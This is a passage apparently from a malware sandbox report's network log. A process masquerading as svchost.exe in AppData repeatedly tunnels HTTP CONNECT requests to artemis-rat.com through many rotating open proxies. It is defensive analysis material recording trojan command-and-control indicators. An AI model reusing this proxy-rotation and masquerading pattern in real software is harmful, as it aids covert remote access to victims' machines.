Mar 9, 2024 13:14:29.033819914 CET	263	IN	HTTP/1.1 503 Service Unavailable x-envoy-overloaded: true content-length: 81 content-type: text/plain date: Sat, 09 Mar 2024 11:54:17 GMT server: svcproxy connection: close Data Raw: 75 70 73 74 72 65 61 6d 20 63 6f 6e 6e 65 63 74 20 65 72 72 6f 72 20 6f 72 20 64 69 73 63 6f 6e 6e 65 63 74 2f 72 65 73 65 74 20 62 65 66 6f 72 65 20 68 65 61 64 65 72 73 2e 20 72 65 73 65 74 20 72 65 61 73 6f 6e 3a 20 6f 76 65 72 66 6c 6f 77 Data Ascii: upstream connect error or disconnect/reset before headers. reset reason: overflow

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1934	192.168.2.5	55812	190.128.228.182	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.195652962 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.557121038 CET	1286	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:28 GMT Server: Apache/2.4.56 (Ubuntu) Set-Cookie: PHPSESSID=i8njl4ga2eb9m6v146dumronka; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Length: 5101 Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 69 6d 67 2f 66 75 74 75 72 61 2e 70 6e 67 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 55 54 55 52 41 31 30 30 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 21 2d 2d 20 46 6f 6e 74 66 61 63 65 73 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 66 6f 6e 74 2d 66 61 63 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2d 35 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 21 2d 2d 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 6d 64 69 2d 66 6f 6e 74 2f 63 73 73 2f 6d 61 74 65 72 69 61 6c 2d 64 65 73 69 67 6e 2d 69 63 6f 6e 69 63 2d 66 6f 6e 74 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2d 2d 3e 0d 0a 0d 0a 3c 21 2d 2d 20 42 6f 6f 74 73 74 72 61 70 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 73 74 61 74 69 63 2f 6c 69 62 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 0d 0a 3c 21 2d 2d 20 63 6f 64 69 67 6f 73 20 43 53 53 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 61 6e 69 6d 73 69 74 69 6f 6e 2f 61 6e 69 6d 73 69 74 69 6f 6e 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 70 65 72 66 65 63 74 2d 73 63 72 6f 6c 6c 62 61 72 2f 70 65 72 66 65 63 74 2d 73 63 72 6f 6c 6c 62 61 72 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2d 2d 3e 0d 0a 0d 0a 3c 21 2d 2d Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <link rel="icon" href="static/src/img/futura.png"> <title>FUTURA100</title><link href="css/style.css" rel="stylesheet" media="all">... Fontfaces CSS--><link href="css/font-face.css" rel="stylesheet" media="all"><link href="codigos/font-awesome-5/css/fontawesome-all.min.css" rel="stylesheet" media="all">...<link href="codigos/mdi-font/css/material-design-iconic-font.min.css" rel="stylesheet" media="all">-->... Bootstrap CSS--><link href="static/lib/css/bootstrap/bootstrap.css" rel="stylesheet" media="all">... codigos CSS<link href="codigos/animsition/animsition.min.css" rel="stylesheet" media="all"><link href="codigos/perfect-scrollbar/perfect-scrollbar.css" rel="stylesheet" media="all">-->...
Mar 9, 2024 13:14:28.557225943 CET	1286	IN	Data Raw: 20 4d 61 69 6e 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 74 6f 75 72 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 Data Ascii: Main CSS--><link href="css/bootstrap-tour.min.css" rel="stylesheet" media="all"><link href="css/bootstrap-tour-standalone.css" rel="stylesheet" media="all"><link href="css/theme.css" rel="stylesheet" media="all"><link rel="stylesh
Mar 9, 2024 13:14:28.557326078 CET	1286	IN	Data Raw: 74 72 61 70 2d 74 6f 75 72 2d 30 2e 31 32 2e 30 2f 72 65 74 69 6e 61 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 Data Ascii: trap-tour-0.12.0/retina.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/xlsx/0.18.5/xlsx.full.min.js" integrity="sha512-r22gChDnGvBylk90+2e/ycr3RVrDi8DIOkIGNhJlKfuyQM4tIRAI062MaV8sfjQKYVGjOBaZBOA87z+IhZE9DA==" crossorigi
Mar 9, 2024 13:14:28.557590961 CET	1286	IN	Data Raw: 69 c3 b3 6e 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e Data Ascii: in</button> </div> </div> </div> </div> <div class="p-3 d-flex justify-content-center mt-5" style="background-color: rgba(0, 0, 0, -0.9);width: 400px; margin-left:auto;margin-r
Mar 9, 2024 13:14:28.557602882 CET	298	IN	Data Raw: 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 6a 73 2f 6c 6f 67 69 Data Ascii: <script src="static/src/js/main.js"></script> <script src="static/src/js/login.js"></script> <script src="static/lib/js/bootstrap-tour-0.12.0/bootstrap-tour.min.js"></script> <script src="static/lib/js/bootstrap-tour-0.12.0/bootst
Mar 9, 2024 13:14:28.560094118 CET	177	OUT	Data Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 a3 86 12 a2 7e f6 23 b3 b4 bf 4e 67 53 a4 37 44 57 c9 b5 9f 56 fc 4f 14 3a e9 9e f2 49 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: eR~#NgS7DWVO:I*,+0/$#('=<5/Uartemis-rat.com#
Mar 9, 2024 13:14:28.918042898 CET	494	IN	HTTP/1.1 400 Bad Request Date: Sat, 09 Mar 2024 12:14:28 GMT Server: Apache/2.4.56 (Ubuntu) Content-Length: 312 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 67 72 2e 66 75 74 75 72 61 31 30 30 2e 63 6f 6d 2e 70 79 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.56 (Ubuntu) Server at agr.futura100.com.py Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1935	192.168.2.5	55926	52.73.224.54	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.206892967 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.428816080 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:28 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1936	192.168.2.5	56034	104.18.234.218	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.212034941 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.366350889 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1937	192.168.2.5	55867	134.209.189.42	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.213728905 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.504620075 CET	327	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1938	192.168.2.5	55956	104.200.152.30	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.215873003 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1939	192.168.2.5	56206	45.144.30.232	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.225334883 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1940	192.168.2.5	55765	90.188.250.16	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.227089882 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1941	192.168.2.5	56214	45.144.30.232	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.227526903 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1942	192.168.2.5	56216	45.144.30.232	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.229366064 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1943	192.168.2.5	56003	35.185.196.38	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.229449034 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.431152105 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1944	192.168.2.5	56219	45.144.30.232	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.231520891 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1945	192.168.2.5	55959	198.199.86.11	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.233824968 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.374125957 CET	28	IN	HTTP/1.1 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1946	192.168.2.5	56226	43.157.32.230	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.237121105 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1947	192.168.2.5	56227	43.157.32.230	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.237951994 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1948	192.168.2.5	55846	103.23.100.1	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.238476038 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1949	192.168.2.5	56228	43.157.32.230	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.240051031 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1950	192.168.2.5	56229	43.157.32.230	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.241300106 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1951	192.168.2.5	55890	37.187.77.58	49507	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.251113892 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.911223888 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.942796946 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1952	192.168.2.5	55904	119.196.168.183	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.251535892 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1953	192.168.2.5	55908	178.33.163.156	42380	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.253846884 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.895586014 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.833762884 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.833678007 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.646301985 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1954	192.168.2.5	56009	157.185.157.151	26589	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.253921986 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1955	192.168.2.5	55922	13.81.217.201	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.260668993 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.911222935 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.833754063 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.646279097 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.333600044 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1956	192.168.2.5	56052	92.204.134.38	9375	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
